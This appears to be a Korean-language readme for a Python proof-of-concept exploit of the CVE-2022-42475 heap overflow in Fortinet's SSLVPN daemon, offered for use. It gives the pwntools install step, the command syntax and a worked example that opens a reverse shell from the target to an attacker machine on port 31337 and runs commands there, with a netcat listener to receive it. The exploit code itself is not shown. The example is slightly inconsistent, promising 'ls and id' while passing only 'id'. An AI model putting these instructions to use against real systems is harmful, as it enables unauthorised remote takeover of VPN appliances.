
Fortinet SSLVPN 데몬의 CVE-2022-42475 힙 오버플로우 취약점을 이용하는 Python 익스플로잇입니다. pwntools를 통해 리버스 셸을 제공하며 대상, 포트 및 명령어를 사용자 정의할 수 있습니다.
Fortinet의 SSLVPN 데몬에서 힙 오버플로우를 악용하는 POC 코드
pip install pwntools 이 코드를 사용하려면, 파일(예: exploit.py)에 저장한 후, 필요한 인수를 전달하여 명령줄에서 Python으로 실행하면 됩니다. 다음은 익스플로잇을 실행하는 예제 명령입니다.
python exploit.py <target_host> <target_port> <reverse_ip>
<target_host>를 대상 시스템의 호스트명 또는 IP 주소로, <target_port>를 취약한 서비스의 포트 번호로, <reverse_ip>를 쉘을 수신할 머신의 IP 주소로 바꾸십시오. 나머지 인수는 공백으로 구분하여 실행할 명령어들입니다.
예를 들어, 대상 시스템의 IP 주소가 192.168.0.100이고, 취약한 서비스가 포트 8080에서 실행 중이며, ls 및 id 명령을 실행하려는 경우 다음 명령을 실행합니다.
python exploit.py 192.168.0.100 8080 192.168.0.101 id
이렇게 하면 192.168.0.101:31337로 리버스 쉘 연결이 생성되고 대상 시스템에서 ls 및 id 명령이 실행됩니다. 리버스 쉘을 수신하려면 지정된 IP 주소와 포트에서 리스너를 실행 중이어야 합니다. ncat 또는 netcat과 같은 도구를 사용하여 리스너를 만들 수 있습니다.